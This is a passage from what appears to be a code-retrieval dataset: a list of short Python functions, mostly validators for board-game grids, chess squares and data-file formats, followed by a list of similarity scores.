in_a_row == False:\n target = 0\n for i in substring:\n target += (match[target] == i)\n return (target == maxi)\n if in_a_row == None:\n for i in self.parse_type:\n if i in match:\n match = match.replace(i, '', 1)\n return (match == \"\")\n return None", "def checkColumns( self ):\n\n for x in list(range(0,3)):\n firstVal = self.__grid[x]\n secondVal = self.__grid[x+3]\n thirdVal = self.__grid[x+6]\n\n compiledVal = str(firstVal) + str(secondVal) + str(thirdVal)\n\n if 'xx' in compiledVal.lower():\n return ('X', compiledVal)\n\n elif 'oo' in compiledVal.lower():\n return ('O', compiledVal)\n\n elif compiledVal.lower() == 'x4x' or \\\n compiledVal.lower() == 'x5x' or \\\n compiledVal.lower() == 'x6x':\n\n return ('X', compiledVal) \n\n return None", "def valid_sudoku(table):\r\n # check rows\r\n for row in table:\r\n row_dict = {}\r\n for elem in row:\r\n if elem != \".\":\r\n row_dict[elem] = row_dict.get(elem, 0) + 1\r\n if row_dict[elem] > 1:\r\n return False\r\n # check columns\r\n for i in range(9):\r\n col_dict = {}\r\n for j in range(9):\r\n elem = table[j][i]\r\n if elem != \".\":\r\n col_dict[elem] = col_dict.get(elem, 0) + 1\r\n if col_dict[elem] > 1:\r\n return False\r\n\r\n # check squares\r\n for i in range(3):\r\n for j in range(3):\r\n square_dict = {}\r\n for x in range(3):\r\n for y in range(3):\r\n elem = table[i*3 + x][j*3 + y]\r\n if elem != \".\":\r\n square_dict[elem] = square_dict.get(elem, 0) + 1\r\n if square_dict[elem] > 1:\r\n return False\r\n return True", "def is_valid_part1(line):\n char_min, char_max, required_char, password = parse_line(line)\n char_count = password.count(required_char)\n if (char_min <= char_count <= char_max):\n return True\n return False", "def check_full_board(self): #rows then columns\n for row in self.board:\n for column_of_row in row:\n if column_of_row == ' ':\n return False\n return True", "def make_rowcol(string):\n rowlens = [len(x) + 1 for x in string.split(\"\\n\")]\n rowpos = []\n acc = 0\n for i in 
rowlens:\n acc += i\n rowpos.append(acc)\n\n def rowcol(pos):\n last = 0\n for i, k in enumerate(rowpos, 0):\n if pos < k:\n return (i, pos - last)\n last = k\n return (-1, -1)\n return rowcol", "def _row_or_col_is_header(s_count, v_count):\n if s_count == 1 and v_count == 1:\n return False\n else:\n return (s_count + 1) / (v_count + s_count + 1) >= 2. / 3.", "def validated(x, y, playing_field):\n # user_input_cell = (x, y)\n if playing_field[x][y] == '*':\n True\n else:\n return False", "def letter_check(read):\n string=\"ACTG\"\n for line_number,line in enumerate(read):\n sequence=line.rstrip()\n if any(x not in string for x in sequence):\n return 0\n return 1", "def check_column_count(cls, line):\n\n # MAGIC n_cols = n_delim + 1 (no trailing delimiter)\n cols = line.count(cls.DELIMITER) + 1\n expected = 7 # MAGIC USAA convention, not all are populated though\n return cols == expected", "def checkLineStandardCompliance(line):\n if len(line) != 5:\n print(line + \" HAS WRONG NUMBER OF COLUMNS: \" + str(len(line)))\n exit(5)", "def _check_row(self):\n match = None\n for row in self._board:\n row_string = ''.join(row)\n match = re.search(WIN_REGEX, row_string)\n if match:\n return match.group()[0]\n return None", "def get_col():\n\n while True:\n try:\n guess_letter = str(input(\"Guess a column: \\n\")).upper()\n guess = letter_and_index_conversion(guess_letter, grid_size)\n if guess in range(1, grid_size + 1):\n return guess\n else:\n print(\"Bruh! That's not even in the ocean o_O\")\n except ValueError:\n print(\n f\"\\nPlease enter a letter for the column between {alphabet_list[0]} and {alphabet_list[grid_size - 1]}\"\n )", "def checkio(game_result: List[str]) -> str:\n # row check\n if \"XXX\" in game_result:\n return \"X\"\n if \"OOO\" in game_result:\n return \"O\"\n # column check\n if game_result[0][0] == game_result[1][0] == game_result[2][0] != '.':\n return game_result[0][0]\n if game_result[0][1] == game_result[1][1] == game_result[2][1] != '.':\n return game_result[0][1]\n if game_result[0][2] == game_result[1][2] == game_result[2][2] != '.':\n return game_result[0][2]\n # diagonal check\n if game_result[0][0] == game_result[1][1] == game_result[2][2] != '.':\n return game_result[1][1]\n # anti-diagonal check\n if game_result[0][2] == game_result[1][1] == game_result[2][0] != '.':\n return game_result[1][1]\n return \"D\"", "def test_clean_row_lowercase(self):\n\t\tobj_ut = sentiment.clean_row(\n\t\t\t'100\\tAn APPLE so GOODforme')\n\t\tself.assertEqual(obj_ut[1], \"an apple so goodforme\")", "def check_cols(self):\r\n for i in range(3):\r\n if self.grid[i][-1] != ' ' and self.grid[i][-1] == self.grid[i+3][-1] and self.grid[i+3][-1] == self.grid[i+6][-1]:\r\n return (i, (self.grid[i], self.grid[i+6]))\r\n return (-1, None)", "def toindex(col, row):\n a2z = 'ABCDEFGHIJLKMNOPQRSTUVWXYZ'\n\n total = 0\n mult = 0\n for char in col:\n total += (a2z.find(char) + (26 * mult))\n mult += 1\n\n return total, row - 1", "def parse_cell_ref(s):\n row_num = None\n col_num = None\n for c in s.upper():\n n = ord(c)\n if 48 <= n <= 57: # a digit\n if row_num is None:\n row_num = n - 48\n else:\n row_num = row_num * 10 + n - 48\n elif 65 <= n <= 90: # a letter\n if col_num is None:\n col_num = n - 65\n else:\n col_num = (col_num + 1) * 26 + n - 65\n return (row_num - 1, col_num,)", "def is_valid_position(self, somerow, somecol):\n valid_row = 0 <= somerow <= (self.size-1)\n valid_col = 0 <= somecol <= (self.size-1)\n #need to use self.size - 1 because while we're thinking of an 8x8 chess board, 
the computer is thinking of a 0x7 chess board\n return valid_row and valid_col", "def caseStr2Int(self,c):\n\n err=(\n 'The square name must be 2 caracters i.e. e2,e4,b1...',\n 'Incorrect square name. Please enter i.e. e2,e4,b1...'\n ) \n letters=('a','b','c','d','e','f','g','h')\n numbers=('1','2','3','4','5','6','7','8')\n \n if(len(c)!=2):\n print(err[0])\n return -1\n \n if(c[0] not in letters):\n print(err[1])\n return -1\n \n if(c[1] not in numbers):\n print(err[1])\n return -1\n \n return self.coord.index(c)", "def test_has_no_letters(row):\n assert sudoku.no_duplicates(row)", "def is_valid_input(letter_guessed):\n\n #calulate the lengh of the letters\n NumberOfCharacters = (len(letter_guessed))\n #convert input letters to Underscore\n NumberOfUnderscore = (NumberOfCharacters * \"_\")\n\n\n # All the letters in English\n EnglishLetter = \"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMOPQRSTUVWXYZ\"\n\n\n if NumberOfCharacters > 1:\n print(\"false\")\n\n # If the user entered English character the string will print the character a non-English character (for example, a sign such as: &, *), the string will print \"E2\n elif letter_guessed in EnglishLetter:\n print(\"true\")\n else:\n print(\"false\")", "def test_starts_letter(x):\n return x[0].isalpha()", "def is_valid_string_name(src):\n\n return src[0].isupper()", "def check_slice(self, m1, m2):\n\n if m1 == \"U'\" and m2 == \"D\" or m2 == \"U'\" and m1 == \"D\":\n return \"E' y'\"\n if m1 == \"U\" and m2 == \"D'\" or m2 == \"U\" and m1 == \"D'\":\n return \"E y\"\n if m1 == \"R\" and m2 == \"L'\" or m2 == \"R\" and m1 == \"L'\":\n return \"M x\"\n if m1 == \"R'\" and m2 == \"L\" or m2 == \"R'\" and m1 == \"L\":\n return \"M' x'\"\n if m1 == \"F\" and m2 == \"B'\" or m2 == \"F\" and m1 == \"B'\":\n return \"S' z\"\n if m1 == \"F'\" and m2 == \"B\" or m2 == \"F'\" and m1 == \"B\":\n return \"S z'\"\n\n return None", "def check_word_format(word):\n pattern = re.compile(\"[a-z]+\")\n if not(1 <= len(word) <= 5):\n print(\"BAD FORMAT: Word must be 1-5 letters long.\")\n return False\n if not(pattern.fullmatch(word)):\n print(\"BAD FORMAT: Word must be only letters (a-z, A-Z)\")\n return False\n return True", "def _check_value(self):\n value = str(self._value_field.toPlainText())\n if value=='': return True\n ACCEPTABLES_CHARS = ('1', '2', '3', '4', '5', '6', '7', '8', '9', '0',\n '.', ',', ';', ' ', '\\n', '-')\n\n for char in value:\n if not char in ACCEPTABLES_CHARS:\n return False\n if Variable.is_acceptable_arg(value):\n rows, columns = np.matrix(value).shape\n return 1 <= rows <= 4 and 1 <= columns <= 4\n else:\n return False", "def is_horizontal(line:tuple)->bool:\n return line[0][1] == line[1][1]", "def is_col_legal(self, from_col, from_row) -> bool:\n # If card is not playable - return False\n if from_col is None and from_row == -1:\n return False\n if self.solitaire[from_col, from_row].is_facedown:\n return False\n # If card is the last in a column: return True\n if self.is_leaf_card(from_col, from_row):\n # self.leaf_cards[from_col] = self.solitaire[from_col, from_row]\n return True\n # Loop through the column starting at \"from_row\"\n for i, card in enumerate(self.solitaire[from_col]):\n # 0 = no card or empty space\n if card == 0:\n break\n # Only look at cards starting AFTER\n if i > from_row:\n card_above = self.solitaire[from_col, i-1]\n if not card.can_be_moved_to(card_above):\n return False\n return True", "def check_parameter_file(filename):\n\n # Load file\n with open(filename, \"r\") as fin:\n content = fin.read()\n\n # 
Check cols and splits strings\n\n bad_names = []\n line_numbers = []\n\n strs = [\"cols\", \"splits\", \"divs\"]\n\n for tstr in strs:\n\n start = content.find(tstr)\n\n while start != -1:\n\n cols_str = \"\".join(content[start:].split(\"\\n\")[0].split(\"=\")[-1].split(\" \"))\n\n semis = cols_str.count(\";\")\n\n # Get line number\n line_end = content.find(\"\\n\", start)\n line_number = content[:line_end].count(\"\\n\") + 1\n\n if tstr == \"divs\":\n colons = cols_str.count(\",\")\n else:\n colons = cols_str.count(\":\")\n\n if colons != (semis + 1):\n bad_names.append(tstr)\n line_numbers.append(line_number)\n\n start = content.find(tstr, start + 1)\n\n return bad_names, line_numbers", "def find_three_in_row(self, row):\n\n if row[0] != ' ' and row[0] == row[1] and row[1] == row[2]:\n return True\n else:\n return False", "def valid(self, col, rank):\n return rank <= 8 and rank > 0 and self.getColIdx(col) < 8 and self.getColIdx(col) >= 0", "def valid(self, col, rank):\n return rank <= 8 and rank > 0 and self.getColIdx(col) < 8 and self.getColIdx(col) >= 0", "def human_go(self, board):\r\n coord_pattern = re.compile(\r\n \"[0-{}],[0-{}]\".format(board.shape[0], board.shape[1])\r\n )\r\n print(\"Enter Coordinates of your go then press enter.\")\r\n input_str = input(\"(space seperated, 0-2 with origin in top left)\\n\")\r\n\r\n if not coord_pattern.match(input_str):\r\n print(\"That is not in the right format, please try again...\")\r\n return self.human_go(board)\r\n else:\r\n y, x = [int(coord) for coord in input_str.split(\",\")]\r\n if board[x][y] != 0:\r\n print(\"That square is already taken, please try again\")\r\n self.human_go()\r\n else:\r\n board[x][y] = -1\r\n return board", "def is_valid_matrix_server_name(string: str) -> bool:\n\n try:\n host, port = parse_server_name(string)\n except ValueError:\n return False\n\n valid_ipv4_addr = isIPAddress(host)\n valid_ipv6_literal = (\n host[0] == \"[\" and host[-1] == \"]\" and isIPv6Address(host[1:-1])\n )\n\n return valid_ipv4_addr or valid_ipv6_literal or is_valid_hostname(host)", "def _validate_data_format(data_format):\n data_format_ = str(data_format).upper()\n if data_format_ in {'NHWC', 'NCHW'}:\n return data_format_\n raise ValueError(\n 'Argument data_format=\"{}\" not recognized; must be one of '\n '{{\"NHWC\", \"NCHW\"}} (case insensitive).'.format(data_format))", "def check_rows(self):\r\n for i in range(0, len(self.grid),3):\r\n if self.grid[i][-1] != ' ' and self.grid[i][-1] == self.grid[i+1][-1] and self.grid[i+1][-1] == self.grid[i+2][-1]:\r\n return (i, (self.grid[i], self.grid[i+2]))\r\n return (-1, None)", "def check_valid_csv_data(self, row):\n obj = re.match(re.compile('^[0-9]{4}\\,[A-Z]{1}[a-z]{2}\\,.'),\n ','.join(row))\n if not obj:\n raise Exception(\"Invalid Data String must be like `1990` `Jan` Check Sample file\")", "def test_row_col(board, rows):\n for i in range(len(board)):\n cur_player = board[i][0] if rows else board[0][i]\n in_a_row = 0\n for j in range(len(board)):\n symbol = board[i][j] if rows else board[j][i]\n if (not symbol == '-') and (symbol == cur_player):\n in_a_row += 1\n else:\n break\n winner = who_won(in_a_row, len(board), cur_player)\n if not winner == 0:\n return winner\n return 0", "def is_valid(columns, row, col):\n # `row` is the current row; check against all previous rows\n for r in range(row):\n c = columns[r]\n # Check column\n if c == col:\n return False\n # Check diagonal\n if abs(c - col) == row - r:\n return False\n return True", "def valid_format(s):\n if len(s) > 7:\n 
return False\n elif '0' in s and len(s) == 1:\n return True\n elif s[0] == '0' and len(s) > 1:\n return False\n elif introcs.isalpha(s):\n return False\n elif (len(s) > 3) and (introcs.count_str(s, ',') == 0):\n return False\n elif introcs.count_str(s, ',') == 0:\n return introcs.isdecimal(s)\n elif introcs.count_str(s, ',') > 1:\n return False\n elif ',' in s and introcs.count_str(s,',') == 1:\n comma_check = s[introcs.find_str(s, ',')+1:]\n before_comma_check = s[:introcs.find_str(s, ',')]\n introcs.isdecimal(before_comma_check)\n return (True if len(comma_check) == 3 else False) and introcs.isdecimal(before_comma_check)", "def validate(name, bracket, bracket_side, bfr):\n\n return bfr[bracket.begin:bracket.end].islower()", "def caseStr2Int(self, c):\n\n err = (\n 'The square name must be 2 caracters i.e. e2,e4,b1...',\n 'Incorrect square name. Please enter i.e. e2,e4,b1...'\n )\n letters = ('a', 'b', 'c', 'd', 'e', 'f', 'g', 'h')\n numbers = ('1', '2', '3', '4', '5', '6', '7', '8')\n\n if (len(c) != 2):\n print(err[0])\n return -1\n\n if (c[0] not in letters):\n print(err[1])\n return -1\n\n if (c[1] not in numbers):\n print(err[1])\n return -1\n\n return self.coord.index(c)", "def checkio(game_result: List[str]) -> str:\n # row check\n if 'XXX' in game_result:\n return \"X\"\n if 'OOO' in game_result:\n return 'O'\n # column check\n if ('X', 'X', 'X') in zip(*game_result):\n return 'X'\n if ('O', 'O', 'O') in zip(*game_result):\n return 'O'\n # diagonal check\n if game_result[0][0] == game_result[1][1] == game_result[2][2] != '.':\n return game_result[1][1]\n # anti-diagonal check\n if game_result[0][2] == game_result[1][1] == game_result[2][0] != '.':\n return game_result[1][1]\n return 'D'", "def validateFormat(barcode):\r\n validatesymbol = 0\r\n delimitedsymbol = 0\r\n if barcode[0] == '' or barcode[-1] == '':\r\n validatesymbol += 1\r\n for i in range(len(barcode)):\r\n try:\r\n int(barcode[i])\r\n except ValueError:\r\n if barcode[i] == '-':\r\n delimitedsymbol += 1\r\n else:\r\n validatesymbol += 1\r\n if delimitedsymbol == 0 and validatesymbol == 0:\r\n if len(barcode) == 12 or len(barcode) == 13:\r\n pass\r\n else:\r\n validatesymbol += 1\r\n if validatesymbol == 0:\r\n return True\r\n else:\r\n return False", "def is_valid(gr, pos, num):\n \n row = pos[0]\n col = pos[1]\n \n for i in range(0, 9):\n # test row\n if(i != col and gr[row][i] == num):\n return False\n # test col\n if(i != row and gr[i][col] == num):\n return False\n\n # test 3x3 square\n small_row = floor(row / 3) * 3\n small_col = floor(col / 3) * 3\n\n for i in range(small_row, small_row + 3):\n for j in range(small_col, small_col + 3):\n if((i != row and j != col) and gr[i][j] == num):\n return False\n \n return True", "def isAMANDATrig(string, pos):\n return string == 0 and pos == 92", "def validateBed12(df):\n try:\n msg = ''\n if df.isnull().values.any() == True: \n msg = 'Missing values' + '\\n' + str(df.isnull().sum())\n return [False, msg]\n if (all(x in ['+', '-'] for x in df['strand'].cat.categories.tolist())) != True:\n msg = 'Bad strand symbol(has to be + or -'\n return [False, msg]\n if all(y.isdigit() for z in df['blockSizes'].map(lambda x: x.split(',')[:-1]).tolist()[0] for y in z ) == False:\n msg = 'Column blockSizes contains non int values'\n return [False, msg] \n if all(y.isdigit() for z in df['blockStarts'].map(lambda x: x.split(',')[:-1]).tolist()[0] for y in z ) == False:\n msg = 'Column blockStarts contains non int values'\n return [False, msg]\n return [True, msg]\n except (TypeError, 
AttributeError, KeyError):\n return [False, 'Not a valid dataframe']", "def test_standardize_xyz_string(self):\n xyz = \"\"\"\n \n \n C -0.67567701 1.18507660 0.04672449\n H -0.25592948 1.62415961 0.92757746\n H -2.26870864 1.38030564 0.05865317\n O -0.36671999 -0.21081064 0.01630374\n H -0.73553821 -0.63718986 0.79332805\n C -0.08400571 1.86907236 -1.19973252\n \n H -0.50375517 1.42998100 -2.08057962\n H -0.31518819 2.91354759 -1.17697025\n H 0.97802159 1.73893214 -1.20769117\n O -3.69788377 1.55609096 0.07050345\n O -4.28667752 0.37487691 0.04916102\n H -4.01978712 -0.12970163 0.82103635\n \n \"\"\"\n expected_xyz = \"\"\"C -0.67567701 1.18507660 0.04672449\nH -0.25592948 1.62415961 0.92757746\nH -2.26870864 1.38030564 0.05865317\nO -0.36671999 -0.21081064 0.01630374\nH -0.73553821 -0.63718986 0.79332805\nC -0.08400571 1.86907236 -1.19973252\nH -0.50375517 1.42998100 -2.08057962\nH -0.31518819 2.91354759 -1.17697025\nH 0.97802159 1.73893214 -1.20769117\nO -3.69788377 1.55609096 0.07050345\nO -4.28667752 0.37487691 0.04916102\nH -4.01978712 -0.12970163 0.82103635\"\"\"\n new_xyz = converter.standardize_xyz_string(xyz)\n self.assertEqual(new_xyz, converter.standardize_xyz_string(expected_xyz))", "def check_string( pname, use ):\n for l in pname:\n if l in string.letters: continue\n if l in string.digits : continue\n if l =='_' : continue\n print( \"your \"+use+\" (\" + pname + \") contains invalid characters, please choose another one!\" )\n return False\n return True", "def parse_test_case(text):\n rows = [list(item) for item in text.split('\\n')]\n columns = [[], [], [], []]\n diagonals = [[], []]\n for i in range(4):\n for j in range(4):\n columns[j].append(rows[i][j])\n if i == j:\n diagonals[0].append(rows[i][j])\n if (i, j) in [(0, 3), (1, 2), (2, 1), (3, 0)]:\n diagonals[1].append(rows[i][j])\n return rows + columns + diagonals", "def validateWithDocString(self, x):\n up = 0\n sp = 0\n numb = 0\n ints = [\"0\", \"1\", \"2\", \"3\", \"4\", \"5\", \"6\", \"7\", \"8\", \"9\"]\n special = string.punctuation\n if type(x) is str:\n if len(x) >= 8:\n for i in x:\n if i.isupper():\n up += 1\n if i in special:\n sp += 1\n if i in ints:\n numb += 1\n if up >= 1 and sp >= 1 and numb >= 1:\n return True\n else:\n return False\n else:\n return False\n else:\n raise TypeError(\"Error\")", "def can_add_to(self, col):\n if col < 0 or col >= self.width:\n return False\n else :\n for r in range(self.height):\n if self.slots[r][col] == ' ':\n return True\n return False", "def _get_row_fow_letter(cls, letter):\n row_map = {\n 'A': 1, 'B': 2, 'C': 3, 'D': 4, 'E': 5,\n 'F': 6, 'G': 7, 'H': 8, 'I': 9, 'J': 10,\n }\n try:\n return row_map[letter]\n except KeyError:\n raise ValueError('The letter of the row must '\n 'be between A to J uppercase')", "def find_matches(word, string_grid, separator='\\n'):\n word_len = len(word)\n if isinstance(string_grid, list):\n matrix = string_grid\n else:\n matrix = matrixify(string_grid, separator)\n row_length, column_length = len(matrix), len(matrix[0])\n base_matches = find_base_match(word[0], matrix)\n\n if column_length < word_len > row_length or not base_matches:\n return []\n elif word_len == 1:\n return base_matches\n\n return complete_match(word, matrix, base_matches, word_len, row_length, column_length)", "def check_if_a_choice(string):\n if string[0].isupper() and string[1] == \".\" \\\n and (string[2] == ' ' or string[2] == '\\t'):\n return True\n else:\n return False", "def is_solved(bd):\n \"\"\" CONSTRAINT: Assumes board is valid\"\"\"\n count = 0\n for 
pos in bd:\n if pos == \" \":\n count += 1\n else:\n continue\n if count > 0:\n return False\n else:\n return True", "def validate_image_col_row(image, col, row):\n SPLIT_LIMIT = 99\n\n try:\n col = int(col)\n row = int(row)\n except BaseException:\n raise ValueError(\"columns and rows values could not be cast to integer.\")\n\n if col < 1 or row < 1 or col > SPLIT_LIMIT or row > SPLIT_LIMIT:\n raise ValueError(\n f\"Number of columns and rows must be between 1 and\"\n f\"{SPLIT_LIMIT} (you asked for rows: {row} and col: {col}).\"\n )\n if col == 1 and row == 1:\n raise ValueError(\"There is nothing to divide. You asked for the entire image.\")", "def TestColumn(SudokuGrid):\r\n for i in range(9):\r\n for j in range(8):\r\n for k in range(j+1,9):\r\n if SudokuGrid[j][i]==SudokuGrid[k][i]:\r\n return False\r\n return True", "def test_extract_column_zero_and_one_correct_content():\n data = \"\"\"kylebarnes@hotmail.com,Records manager\njoe70@yahoo.com,Network engineer\ntorresjames@white.info,Electrical engineer\nshawkins@watson.com,Science writer\"\"\"\n result = extract.extract_data_given_column(data, 0)\n assert \"shawkins@watson.com\" in result\n result = extract.extract_data_given_column(data, 1)\n assert \"Records manager\" in result", "def check_header_chars(header,\r\n warnings,\r\n allowed_chars_header='_' + digits + letters):\r\n\r\n for curr_elem in range(len(header)):\r\n for curr_char in header[curr_elem]:\r\n if curr_char not in allowed_chars_header:\r\n warnings.append('Found invalid character in %s ' %\r\n header[curr_elem] + 'header field.\\t%d,%d' % (0, curr_elem))\r\n break\r\n\r\n return warnings", "def _is_valid_keyspace_name(self, keyspace_name):\n if keyspace_name == None or not keyspace_name:\n return False\n return re.match(r\"^[a-z_]*[^-]$\", keyspace_name)", "def in_col(n: int, row: int, col: int, grid: List) -> bool:\n for x in range(9):\n if x!= row and n == grid[x][col]:\n return True\n return False", "def is_uppercase(character):\n return 'A' <= character <= 'Z'", "def isRecordNameValid(record):\n # Split the string with the record separator ':'\n splitted = record.split(':')\n # There must be 5 values - year:month:day:hour:minute\n if len(splitted) != 5:\n # Not valid - more or less than 5 values\n return False\n # There are 5 values - check each one if is a number\n for x in splitted:\n # If one of the values is not a number - record is not valid\n if not isNumber(x):\n return False\n # The record is valid\n return True", "def must_be_alphanumeric_space_period(cell):\n # Check if it's nan first\n if check_empty(cell):\n return True\n # If it's not nan, check it's a number\n return not bool(re.match(r\"^[a-zA-Z .0-9]+$\", str(cell)))" ]
[ "0.62249833", "0.6188426", "0.6152934", "0.59214056", "0.58721745", "0.5853586", "0.5825021", "0.5805107", "0.5749606", "0.57305473", "0.5700164", "0.5682207", "0.565165", "0.5625806", "0.55352753", "0.55241305", "0.5514427", "0.54875064", "0.5479798", "0.5474993", "0.5458025", "0.5434253", "0.5431049", "0.54138136", "0.53975326", "0.53720367", "0.5331805", "0.5327355", "0.5312943", "0.53053916", "0.53028005", "0.5299787", "0.52969587", "0.52752787", "0.5267957", "0.5259174", "0.5247873", "0.52464575", "0.5244636", "0.52367663", "0.5236533", "0.52293473", "0.5228349", "0.52273685", "0.5226504", "0.5210539", "0.5199466", "0.5193292", "0.5191275", "0.51801693", "0.51647407", "0.51523596", "0.51450515", "0.514183", "0.5126887", "0.5120704", "0.5114463", "0.51042515", "0.5086551", "0.50830203", "0.5065931", "0.50541514", "0.5053617", "0.5048418", "0.5045615", "0.5039746", "0.5039746", "0.5034349", "0.5032968", "0.50297713", "0.502823", "0.50269794", "0.50180286", "0.5012159", "0.501134", "0.500777", "0.5007363", "0.5002029", "0.49986285", "0.49916333", "0.4989316", "0.49738058", "0.49732995", "0.49650154", "0.4964772", "0.49633878", "0.4962328", "0.4961499", "0.49481004", "0.4944057", "0.49425256", "0.49407333", "0.4934924", "0.49310622", "0.49306706", "0.49286562", "0.49280643", "0.49258575", "0.4918591", "0.49128827" ]
0.5664392
12
Returns a string of the possible moves a pawn can make.
def suggestMoves(self, startLoc, moves, hasCapture): suggest = "" for move in moves[startLoc]: if hasCapture: if moves[startLoc][move] == "capture": suggest += chr(move[1] + 97) + str(self.board.size - move[0]) + " " else: suggest += chr(move[1] + 97) + str(self.board.size - move[0]) + " " return suggest
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def legal_moves():\n\tlegal_moves = (\"r\", \"p\", \"s\")\n\treturn legal_moves", "def legal_moves(self):\n moves = \"\"\n swappable = self.swappable_positions\n empty_position = self.get_position(0)\n\n for s in swappable:\n pos_diff = empty_position[0] - s[0], empty_position[1] - s[1]\n if pos_diff[0] > 0:\n moves += \"U\"\n elif pos_diff[0] < 0:\n moves += \"D\"\n elif pos_diff[1] > 0:\n moves += \"L\"\n elif pos_diff[1] < 0:\n moves += \"R\"\n\n return moves", "def legalMoves(self):\n moves = []\n indexOfZero = self.tiles.index(0)\n \n if indexOfZero == 0:\n moves.append('Down')\n moves.append('Right')\n elif indexOfZero == 1:\n moves.append('Down')\n moves.append('Left')\n moves.append('Right')\n elif indexOfZero == 2:\n moves.append('Down')\n moves.append('Left')\n elif indexOfZero == 3:\n moves.append('Up')\n moves.append('Down')\n moves.append('Right')\n elif indexOfZero == 4:\n moves.append('Up')\n moves.append('Down')\n moves.append('Left')\n moves.append('Right')\n elif indexOfZero == 5:\n moves.append('Up')\n moves.append('Down')\n moves.append('Left')\n elif indexOfZero == 6:\n moves.append('Up')\n moves.append('Right')\n elif indexOfZero == 7:\n moves.append('Up')\n moves.append('Left')\n moves.append('Right')\n elif indexOfZero == 8:\n moves.append('Up')\n moves.append('Left')\n else:\n print('something wrong with board')\n return moves", "def get_available_moves(self):\n available = []\n row, col = tuple(self.current_pos)\n if row - 1 >= 0 and self.maze[row - 1][col] != 'x':\n available.append('n')\n if row + 1 < len(self.maze) and self.maze[row + 1][col] != 'x':\n available.append('s')\n if col - 1 >= 0 and self.maze[row][col - 1] != 'x':\n available.append('w')\n if col + 1 < len(self.maze[row]) and self.maze[row][col + 1] != 'x':\n available.append('e')\n return available", "def show_possible_moves():\n print(\"Possible moves:\")\n print(\"\\t\\\\sw - Moves a card from Stock to Waste.\")\n print(\"\\t\\\\wf <suit> - Moves a card from Waste to the <suit> Foundation. Suit must be one of: \"\n \"clubs/diamonds/hearts/spades.\")\n print(\"\\t\\\\wt <tableau_num> - Moves a card from Waste to the <tableau_num> Tableau. <tableau_num> must be \"\n \"between 1 and 7, inclusive. \")\n print(\"\\t\\\\tf <tableau_num> <suit> - Moves a card from the <tableau_num> Tableau to the <suit> foundation. \"\n \"Same input rules as above. \")\n print(\"\\t\\\\tt <num_1> <num_2> - Moves all face-up cards from <num_1> Tableau to <num_2> Tableau. Same input \"\n \"rules as above. \")\n print(\"\\t\\\\help - Displays all possible moves. 
\")\n print(\"\\t\\\\quit - Quit the game.\\n\")", "def get_all_possible_moves():\r\n \"\"\"\r\n Creates the labels for the universal chess interface into an array and returns them\r\n \"\"\"\r\n labels_array = []\r\n letters = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h']\r\n numbers = ['1', '2', '3', '4', '5', '6', '7', '8']\r\n promoted_to = ['q', 'r', 'b', 'n']\r\n\r\n for l1 in range(8):\r\n for n1 in range(8):\r\n destinations = [(t, n1) for t in range(8)] + \\\r\n [(l1, t) for t in range(8)] + \\\r\n [(l1 + t, n1 + t) for t in range(-7, 8)] + \\\r\n [(l1 + t, n1 - t) for t in range(-7, 8)] + \\\r\n [(l1 + a, n1 + b) for (a, b) in\r\n [(-2, -1), (-1, -2), (-2, 1), (1, -2), (2, -1), (-1, 2), (2, 1), (1, 2)]]\r\n for (l2, n2) in destinations:\r\n if (l1, n1) != (l2, n2) and l2 in range(8) and n2 in range(8):\r\n move = letters[l1] + numbers[n1] + letters[l2] + numbers[n2]\r\n labels_array.append(move)\r\n for l1 in range(8):\r\n l = letters[l1]\r\n for p in promoted_to:\r\n labels_array.append(l + '2' + l + '1' + p)\r\n labels_array.append(l + '7' + l + '8' + p)\r\n if l1 > 0:\r\n l_l = letters[l1 - 1]\r\n labels_array.append(l + '2' + l_l + '1' + p)\r\n labels_array.append(l + '7' + l_l + '8' + p)\r\n if l1 < 7:\r\n l_r = letters[l1 + 1]\r\n labels_array.append(l + '2' + l_r + '1' + p)\r\n labels_array.append(l + '7' + l_r + '8' + p)\r\n return labels_array", "def generate_possible_moves(self):\r\n\t\t# Moves:\r\n\t\t# 0 - North\r\n\t\t# 1 - East\r\n\t\t# 2 - South\r\n\t\t# 3 - West\r\n\r\n\t\tmoves = []\r\n\r\n\t\tif self.x != 0:\r\n\t\t\tmoves.append(0)\r\n\t\tif self.y != self.n-1:\r\n\t\t\tmoves.append(1)\r\n\t\tif self.x != self.n-1:\r\n\t\t\tmoves.append(2)\r\n\t\tif self.y != 0:\r\n\t\t\tmoves.append(3)\r\n\r\n\t\treturn moves", "def get_possible_moves(self) -> list:\n if self.p1_turn:\n name = '2'\n else:\n name = '1'\n\n count = 0\n for i in self.claim:\n if i == name:\n count += 1\n over = count >= 0.5 * len(self.claim)\n\n moves = []\n if not over:\n for i in self.letters:\n if i.isalpha():\n moves.append(i)\n return moves", "def get_valid_moves(x, y, path):\n \n valids = \"\"\n \n # First compute the hash\n digest = md5(passcode + path).hexdigest()\n \n # Check Up\n if y != 0 and digest[0] in \"bcdef\":\n valids += 'U'\n \n # Check Down\n if y != 3 and digest[1] in \"bcdef\":\n valids += 'D'\n \n # Check Left\n if x != 0 and digest[2] in \"bcdef\":\n valids += 'L'\n \n # Check Right\n if x != 3 and digest[3] in \"bcdef\":\n valids += 'R'\n \n return valids", "def legal_moves():\n i = 0\n moves = []\n for column in STATE[0]:\n if column == '-':\n moves.append(i)\n i += 1\n return moves", "def get_possible_moves(self) -> list:\n p1_count = 0\n p2_count = 0\n ley_line_total = (self.side_length + 1) * 3\n for itype in self.current_ley_lines:\n for line in itype:\n if line[0] == '1':\n p1_count += 1\n if line[0] == '2':\n p2_count += 1\n if p1_count >= ley_line_total / 2 or p2_count >= ley_line_total / 2:\n return []\n moves = []\n for letter in self.current_board:\n if letter.isalpha():\n moves.append(letter)\n return moves", "def get_pawn_moves(self, state):\n pawn_moves = []\n\n if self.color == cc.WHITE_ACTIVE:\n forward_1 = add_vectors(self.coord, cc.V_UP)\n forward_2 = add_vectors(self.coord, cc.V_UP_2)\n attacks = get_crawler_moves(self.coord, cc.W_PAWN_CAPTURE_VECTORS)\n starting_rank = cc.RANK_2\n promo_rank = cc.RANK_8\n promo_pieces = cc.WHITE_PROMO\n enemy_set = cc.BLACK_PIECES\n elif self.color == cc.BLACK_ACTIVE:\n forward_1 = add_vectors(self.coord, cc.V_DOWN)\n 
